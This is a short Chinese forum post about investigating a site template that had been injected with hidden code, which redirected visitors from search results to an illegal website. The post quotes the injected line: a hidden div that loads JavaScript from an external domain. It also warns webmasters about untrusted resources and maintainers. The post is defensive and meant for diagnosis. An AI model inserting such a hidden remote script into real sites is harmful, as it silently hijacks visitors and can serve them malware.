某论坛模板被挂马隐藏跳转到非法网站排查经历

民审-M · 发表于 2017-9-23 21:47:56

今日，一建站学习研究会员报告，自己论坛被百度收录的首页点击进入后会隐藏跳转到一个非法网站页面，经过排查，网站模板漏洞被挂马，
利用语句：

<div style="visibility:hidden;"><script src="//wwww.ccak47.com/fres.js" language="JavaScript"></script>

复制代码

木马js分析：

游客，如果您要查看本帖隐藏内容请回复

请站长们一定要注意自己网站安全，请尽量下载建站学习研究网友发布资源，切勿随意给淘宝或其他非官方人员FTP、后台信息，外面挂马资源横行，骗子维护人员猖狂，很多打着免费的幌子嵌入垃圾代码、挂马代码js等层出不穷，草根吧唯一可以给站长保证的是，草根吧80%资源都是自己应用中心分享的原版插件分享的，其他建站学习研究网友发布的都是建站学习研究自己分享分享给草根吧的。注重自己网站安全，规范自己安全意识十分重要，以上案列清楚显示了病毒挂马行为的运行机制，仅供有相同经历的站长分析查找自己网站漏洞的演示，切勿用于非法用途，否则后果自负。